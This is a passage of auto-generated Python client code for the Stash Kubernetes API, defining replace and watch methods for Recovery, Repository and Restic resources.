:return: ComGithubAppscodeStashApisStashV1alpha1Recovery
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.replace_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, body, **kwargs) # noqa: E501
else:
(data) = self.replace_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, body, **kwargs) # noqa: E501
return data
def replace_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_stash_appscode_com_v1alpha1_namespaced_recovery # noqa: E501
replace the specified Recovery # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.replace_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Recovery (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param ComGithubAppscodeStashApisStashV1alpha1Recovery body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: ComGithubAppscodeStashApisStashV1alpha1Recovery
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_stash_appscode_com_v1alpha1_namespaced_recovery" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `replace_stash_appscode_com_v1alpha1_namespaced_recovery`") # noqa: E501
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `replace_stash_appscode_com_v1alpha1_namespaced_recovery`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `replace_stash_appscode_com_v1alpha1_namespaced_recovery`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/recoveries/{name}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ComGithubAppscodeStashApisStashV1alpha1Recovery', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_stash_appscode_com_v1alpha1_namespaced_repository(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_stash_appscode_com_v1alpha1_namespaced_repository # noqa: E501
replace the specified Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.replace_stash_appscode_com_v1alpha1_namespaced_repository(name, namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Repository (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param ComGithubAppscodeStashApisStashV1alpha1Repository body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: ComGithubAppscodeStashApisStashV1alpha1Repository
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.replace_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, body, **kwargs) # noqa: E501
else:
(data) = self.replace_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, body, **kwargs) # noqa: E501
return data
def replace_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_stash_appscode_com_v1alpha1_namespaced_repository # noqa: E501
replace the specified Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.replace_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Repository (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param ComGithubAppscodeStashApisStashV1alpha1Repository body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: ComGithubAppscodeStashApisStashV1alpha1Repository
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_stash_appscode_com_v1alpha1_namespaced_repository" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `replace_stash_appscode_com_v1alpha1_namespaced_repository`") # noqa: E501
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `replace_stash_appscode_com_v1alpha1_namespaced_repository`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `replace_stash_appscode_com_v1alpha1_namespaced_repository`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/repositories/{name}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ComGithubAppscodeStashApisStashV1alpha1Repository', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_stash_appscode_com_v1alpha1_namespaced_restic(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_stash_appscode_com_v1alpha1_namespaced_restic # noqa: E501
replace the specified Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.replace_stash_appscode_com_v1alpha1_namespaced_restic(name, namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Restic (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param ComGithubAppscodeStashApisStashV1alpha1Restic body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: ComGithubAppscodeStashApisStashV1alpha1Restic
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.replace_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, body, **kwargs) # noqa: E501
else:
(data) = self.replace_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, body, **kwargs) # noqa: E501
return data
def replace_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_stash_appscode_com_v1alpha1_namespaced_restic # noqa: E501
replace the specified Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.replace_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Restic (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param ComGithubAppscodeStashApisStashV1alpha1Restic body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: ComGithubAppscodeStashApisStashV1alpha1Restic
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_stash_appscode_com_v1alpha1_namespaced_restic" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `replace_stash_appscode_com_v1alpha1_namespaced_restic`") # noqa: E501
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `replace_stash_appscode_com_v1alpha1_namespaced_restic`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `replace_stash_appscode_com_v1alpha1_namespaced_restic`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/restics/{name}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ComGithubAppscodeStashApisStashV1alpha1Restic', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def watch_stash_appscode_com_v1alpha1_namespaced_recovery(self, name, namespace, **kwargs): # noqa: E501
"""watch_stash_appscode_com_v1alpha1_namespaced_recovery # noqa: E501
watch changes to an object of kind Recovery # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_namespaced_recovery(name, namespace, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Recovery (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.watch_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, **kwargs) # noqa: E501
else:
(data) = self.watch_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, **kwargs) # noqa: E501
return data
def watch_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""watch_stash_appscode_com_v1alpha1_namespaced_recovery # noqa: E501
watch changes to an object of kind Recovery # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Recovery (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', '_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'pretty', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_stash_appscode_com_v1alpha1_namespaced_recovery" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `watch_stash_appscode_com_v1alpha1_namespaced_recovery`") # noqa: E501
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `watch_stash_appscode_com_v1alpha1_namespaced_recovery`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if '_continue' in params:
query_params.append(('continue', params['_continue'])) # noqa: E501
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector'])) # noqa: E501
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized'])) # noqa: E501
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version'])) # noqa: E501
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds'])) # noqa: E501
if 'watch' in params:
query_params.append(('watch', params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/watch/namespaces/{namespace}/recoveries/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoK8sApimachineryPkgApisMetaV1WatchEvent', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def watch_stash_appscode_com_v1alpha1_namespaced_recovery_list(self, namespace, **kwargs): # noqa: E501
"""watch_stash_appscode_com_v1alpha1_namespaced_recovery_list # noqa: E501
watch individual changes to a list of Recovery # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_namespaced_recovery_list(namespace, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.watch_stash_appscode_com_v1alpha1_namespaced_recovery_list_with_http_info(namespace, **kwargs) # noqa: E501
else:
(data) = self.watch_stash_appscode_com_v1alpha1_namespaced_recovery_list_with_http_info(namespace, **kwargs) # noqa: E501
return data
def watch_stash_appscode_com_v1alpha1_namespaced_recovery_list_with_http_info(self, namespace, **kwargs): # noqa: E501
"""watch_stash_appscode_com_v1alpha1_namespaced_recovery_list # noqa: E501
watch individual changes to a list of Recovery # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_namespaced_recovery_list_with_http_info(namespace, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', '_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'pretty', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_stash_appscode_com_v1alpha1_namespaced_recovery_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `watch_stash_appscode_com_v1alpha1_namespaced_recovery_list`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if '_continue' in params:
query_params.append(('continue', params['_continue'])) # noqa: E501
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector'])) # noqa: E501
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized'])) # noqa: E501
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version'])) # noqa: E501
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds'])) # noqa: E501
if 'watch' in params:
query_params.append(('watch', params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/watch/namespaces/{namespace}/recoveries', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoK8sApimachineryPkgApisMetaV1WatchEvent', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def watch_stash_appscode_com_v1alpha1_namespaced_repository(self, name, namespace, **kwargs): # noqa: E501
"""watch_stash_appscode_com_v1alpha1_namespaced_repository # noqa: E501
watch changes to an object of kind Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_namespaced_repository(name, namespace, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Repository (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.watch_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, **kwargs) # noqa: E501
else:
(data) = self.watch_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, **kwargs) # noqa: E501
return data
def watch_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""watch_stash_appscode_com_v1alpha1_namespaced_repository # noqa: E501
watch changes to an object of kind Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Repository (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
